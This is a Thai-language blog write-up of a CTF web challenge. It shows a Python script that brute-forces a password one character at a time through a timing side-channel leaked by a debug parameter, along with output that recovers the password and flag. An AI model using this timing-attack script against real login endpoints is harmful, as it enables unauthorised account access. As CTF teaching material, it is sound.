หน้าเว็บ

วันเสาร์ที่ 25 เมษายน พ.ศ. 2558

CAMSCTF CCTF 2015: Web B (Exploitation) Write-up


Description:
"Time is what we want most, but what we use worst." - William Penn
Solution:

          Target: http://web.camsctf.com/b/



          Intercept http request with Burp Suite.


          debug=0 ?, try to change debug to 1


          Base64 decode and get a start time and end time.


          "Time", then I see this word, I think It must about Side-channel attack, and my solution below.

#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
import urllib, urllib2, string, re, sys
def minus(num):
return float(num[0]) - float(num[1])
url_check = 'http://web.camsctf.com/b/check.php'
for i in list(string.printable):
password = sys.argv[1]+i
post_data = urllib.urlencode({'password' : password, 'debug' : '1'})
req = urllib2.Request(url_check, post_data)
resp = urllib2.urlopen(req).read()
b64 = re.search("\"reply\":\"(.*)\"",resp).group(1)
print "Password {0} : {1}".format(password,b64)
num = b64.decode('base64').split("-")
result = minus(num)
print "Password {0} : {1}".format(password,result)
'''
root@ubuntu:~# python web300.py "" #see a different amounts of time to process.
...[snip]...
root@ubuntu:~# python web300.py "u"
...[snip]...
root@ubuntu:~# python web300.py "uH"
...[snip]...
root@ubuntu:~# python web300.py "uHH"
...[snip]...
root@ubuntu:~# python web300.py "uHH>n"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)["
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[K"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v:"
...[snip]...
Password uHH>nN#)[Ks5v:A : MTQyOTY3MzA5OS4zMTk2LTE0Mjk2NzMwOTkuNjAwNg==
Password uHH>nN#)[Ks5v:A : -0.280999898911
Password uHH>nN#)[Ks5v:B : MTQyOTY3MzA5OS45NjI2LTE0Mjk2NzMxMDAuMjQzNw==
Password uHH>nN#)[Ks5v:B : -0.281100034714
Password uHH>nN#)[Ks5v:C : MTQyOTY3MzEwMC41NjUtMTQyOTY3MzEwMC44NDU1
Password uHH>nN#)[Ks5v:C : -0.28049993515
Password uHH>nN#)[Ks5v:D : MTQyOTY3MzEwMS4xOTU5LTE0Mjk2NzMxMDEuNDgxMw==
Password uHH>nN#)[Ks5v:D : -0.285400152206
Password uHH>nN#)[Ks5v:E : Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}
'''
view raw web300.py hosted with ❤ by GitHub
          password=uHH>nN#)[Ks5v:E&debug=1 to get the flag. :D

Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}

ไม่มีความคิดเห็น:

แสดงความคิดเห็น

266723